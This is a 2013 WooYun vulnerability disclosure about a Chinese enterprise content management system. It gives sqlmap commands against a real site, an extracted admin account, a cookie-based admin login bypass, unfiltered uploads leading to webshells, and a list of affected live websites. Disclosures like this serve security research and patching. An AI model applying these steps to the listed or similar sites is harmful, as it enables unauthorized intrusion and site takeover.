当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045346

漏洞标题:中华企业网内容管理系统若干漏洞

相关厂商:中华企业网

漏洞作者: 小小

提交时间:2013-12-18 15:57

修复时间:2014-02-01 15:57

公开时间:2014-02-01 15:57

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个貌似用的人不多啊,求一个邀请码

详细说明:

一、SQL注入
在检测新中新的官网时,发现了一处可以sql注入的地方,其实有很多--,果断放到sqlmap上跑,
./sqlmap.py -u http://www.synjones.net/MContent/EasySetup.aspx?type=123 --schema --exclude-sysdbs
sqlmap/1.0-dev-14b2d4c - automatic SQL injection and database takeover tool
http://sqlmap.org
[19:54:36] [INFO] resuming back-end DBMS 'microsoft sql server'
[19:54:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
然后得到了若干数据库,FB0002, FB0003, FB0004, FB0005, FB0006, FB0007, FB0008, FB0009, FB0010, FB0011, FB0012, FB0013, FB0014, FB0015, FB0016, FB0017, FB0018, FB0019, FB0020, FB0021, FB0022, FB0023, FB0024, FB0025, FB0026, FB0027, FB0028, FB0029, FB0030, FB0032, FB0033, FB0034, FB0035, FB0036, FB0037, FB0038, FB0040, FB0041, FB0042, FB0043, FB0044, FB0045, FB0046, FB0047, FB0048, FB0049, FB0050, FB0051, FB0052, FB0053, FB0054, FB0055, FB0056, FB0057, FB0058, FB0059, FB0060, FB0061, FB0062, FB0063, FB0064, FB0065, FB0066, FB0067, FB0068, FB0069, FB0070, FB0071。。。。
使用./sqlmap.py -u http://www.synjones.net/MContent/EasySetup.aspx?type=123 --current-db找到了当前的数据库hwt0162,然后从数据库里找到T_Admin这个表,读出后台管理员的账号密码:
+----------+----------+
| Username | Password |
+----------+----------+
| admin | [email protected]# |
+----------+----------+
登陆后台http://www.synjones.net/hwtUserAdmin/admin/login.aspx,
发现在上传文件,没有对其过滤,于是,上传一个aspx木马文件,可以得到webshell。

synjonesnet.jpg


二、后台管理验证只使用了cookie判断
因此,不需要输入密码,只是修改cookie成为管理员登陆后的cookie,就能管理所有使用此管理系统的网站了,上传文件又没有限制,拿webshell异常简单。另外后台可以直接看到各个管理员的明文密码。
修改如下cookie:
AdminCookie :admin
DownCookie
MediaCookie
NewsCookie
PhotoCookie
ProCookie
其中,后面5个的值可以设为空格,但不能不设,否则会报错。
同上,在上传文件的地方上传webshell即可。
三、由于使用了2.4版本的FckEditor,加上IIS6.0解析问题,所以按照以前的Fckeditor的漏洞上传webshell也是行。

漏洞证明:

另外,发现中华企业网的官网,也同样存在此问题,但是上传文件的路径设置了禁止执行,因此上传webshell失败。。。
发现中华企业网建小型站站的时候,基本把若干网站放到一个服务器,同时都采用了这种系统。。太不靠谱了,不过给大型客户建站的时候还是不错的,自然掏钱肯定多了。。
1. www.xuanyao.sh.cn
2. www.evan.com.cn
3. evan.com.cn
4. richfun.cn
5. www.009k.net
6. a0250.009k.net
7. cnpak.com.cn
8. www.danachina.com.cn
9. a0160.009k.net
10. www.sinoictest.com.cn
...
1. hwt0045.51software.net
2. hwt0322.51software.net
3. www.setsuyo.com.cn
4. www.yina-china.cn
5. bafangcn.cn
6. hwt0003.51software.net
7. hwt0051.51software.net
8. hwt0002.51software.net
9. hwt0033.51software.net
10. www.sumika.com.cn
11. hwt0029.51software.net
12. www.disinfection-china.com
....

修复方案:

登陆验证的判断
过滤注入
附件目录禁止执行

版权声明:转载请注明来源 小小@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝